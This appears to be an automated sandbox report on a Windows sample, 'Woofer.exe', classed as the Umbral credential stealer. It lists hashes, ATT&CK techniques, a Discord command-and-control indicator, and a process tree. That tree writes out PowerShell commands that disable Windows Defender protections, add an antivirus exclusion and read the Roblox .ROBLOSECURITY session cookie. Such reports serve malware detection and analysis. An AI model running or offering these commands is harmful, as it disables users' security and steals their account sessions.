umbral | 8cbfb916aafe951957c1c79531deaa85f3c3d71bd9afa0b42d0996c71371116f

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250211-en
resource tags

arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
submitted
11-02-2025 21:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Woofer.exe
Size

229KB
MD5

8a2615083862de25f6d86c69304a4078
SHA1

4c88dbba86b4023a22700671e2116c96bd8ebb0f
SHA256

8cbfb916aafe951957c1c79531deaa85f3c3d71bd9afa0b42d0996c71371116f
SHA512

ae108ba79a2f5782aa82f90fda878ccc442f15c0938011b5d03bafb0f4c72497813b21f8bf7c4f358f232bf118946e556d2315cf52cdc91c6dd992d7bd326df4
SSDEEP

6144:lloZMArIkd8g+EtXHkv/iD45GEoaxfEY32mfh8ItRub8e1mfi:noZHL+EP85GEoaxfEY32mfh8It8V

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/4548-1-0x0000025D38CD0000-0x0000025D38D10000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1192	powershell.exe
1696	powershell.exe
4976	powershell.exe
3044	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Woofer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
19	discord.com
20	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4668	wmic.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1192	powershell.exe
1192	powershell.exe
1696	powershell.exe
1696	powershell.exe
4976	powershell.exe
4976	powershell.exe
320	powershell.exe
320	powershell.exe
3044	powershell.exe
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4548	Woofer.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	4216	wmic.exe
Token: SeSecurityPrivilege	4216	wmic.exe
Token: SeTakeOwnershipPrivilege	4216	wmic.exe
Token: SeLoadDriverPrivilege	4216	wmic.exe
Token: SeSystemProfilePrivilege	4216	wmic.exe
Token: SeSystemtimePrivilege	4216	wmic.exe
Token: SeProfSingleProcessPrivilege	4216	wmic.exe
Token: SeIncBasePriorityPrivilege	4216	wmic.exe
Token: SeCreatePagefilePrivilege	4216	wmic.exe
Token: SeBackupPrivilege	4216	wmic.exe
Token: SeRestorePrivilege	4216	wmic.exe
Token: SeShutdownPrivilege	4216	wmic.exe
Token: SeDebugPrivilege	4216	wmic.exe
Token: SeSystemEnvironmentPrivilege	4216	wmic.exe
Token: SeRemoteShutdownPrivilege	4216	wmic.exe
Token: SeUndockPrivilege	4216	wmic.exe
Token: SeManageVolumePrivilege	4216	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4548 wrote to memory of 1192	4548	Woofer.exe	88
PID 4548 wrote to memory of 1192	4548	Woofer.exe	88
PID 4548 wrote to memory of 1696	4548	Woofer.exe	90
PID 4548 wrote to memory of 1696	4548	Woofer.exe	90
PID 4548 wrote to memory of 4976	4548	Woofer.exe	92
PID 4548 wrote to memory of 4976	4548	Woofer.exe	92
PID 4548 wrote to memory of 320	4548	Woofer.exe	94
PID 4548 wrote to memory of 320	4548	Woofer.exe	94
PID 4548 wrote to memory of 2080	4548	Woofer.exe	96
PID 4548 wrote to memory of 2080	4548	Woofer.exe	96
PID 4548 wrote to memory of 4216	4548	Woofer.exe	99
PID 4548 wrote to memory of 4216	4548	Woofer.exe	99
PID 4548 wrote to memory of 3616	4548	Woofer.exe	101
PID 4548 wrote to memory of 3616	4548	Woofer.exe	101
PID 4548 wrote to memory of 3044	4548	Woofer.exe	103
PID 4548 wrote to memory of 3044	4548	Woofer.exe	103
PID 4548 wrote to memory of 4668	4548	Woofer.exe	105
PID 4548 wrote to memory of 4668	4548	Woofer.exe	105

C:\Users\Admin\AppData\Local\Temp\Woofer.exe
"C:\Users\Admin\AppData\Local\Temp\Woofer.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Woofer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:320
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4216
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3044
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
28ef595a6cc9f47b8eccb22d4ed50d6c

SHA1
4335de707324b15eba79017938c3da2752d3eea5

SHA256
3abd14d4fe7b5697b2fa84993e7183f4fd2580be5b4e5150da15ddda5a9560b9

SHA512
687b7849faa62a4dabc240b573afa163f0cda9a80be61cebe28ef1461777744d73b465ac92d065093228068540846e79c899445057f5b906f9b9fa9868132208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0c3027b0003400fca8d7ec1c406b6961

SHA1
65862de6554e7906cce8b84538fd137e3ca684a8

SHA256
f9981da1c6ff3b6f34ef8bbb1a1bc7bea9f688067cf8e278beaf427044b49840

SHA512
1caa3b8c46f86d76ca236e17fc2bb5a145a83a45979a9fc237a0fe9cf1863e0dbc204439854ee017e475bdda37b9f3da137d5feba8f098f92d6c7774a0b2a5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ljk2tcvi.cvf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1192-12-0x0000020D79AE0000-0x0000020D79B02000-memory.dmp

Filesize
136KB

Download
memory/1192-14-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/1192-15-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/1192-17-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/1192-13-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/4548-33-0x0000025D534E0000-0x0000025D534FE000-memory.dmp

Filesize
120KB

Download
memory/4548-32-0x0000025D533E0000-0x0000025D53430000-memory.dmp

Filesize
320KB

Download
memory/4548-31-0x0000025D53460000-0x0000025D534D6000-memory.dmp

Filesize
472KB

Download
memory/4548-0-0x00007FFA350C3000-0x00007FFA350C5000-memory.dmp

Filesize
8KB

Download
memory/4548-57-0x00007FFA350C3000-0x00007FFA350C5000-memory.dmp

Filesize
8KB

Download
memory/4548-2-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/4548-71-0x0000025D3AA70000-0x0000025D3AA7A000-memory.dmp

Filesize
40KB

Download
memory/4548-72-0x0000025D3AAB0000-0x0000025D3AAC2000-memory.dmp

Filesize
72KB

Download
memory/4548-76-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download
memory/4548-1-0x0000025D38CD0000-0x0000025D38D10000-memory.dmp

Filesize
256KB

Download
memory/4548-93-0x00007FFA350C0000-0x00007FFA35B81000-memory.dmp

Filesize
10.8MB

Download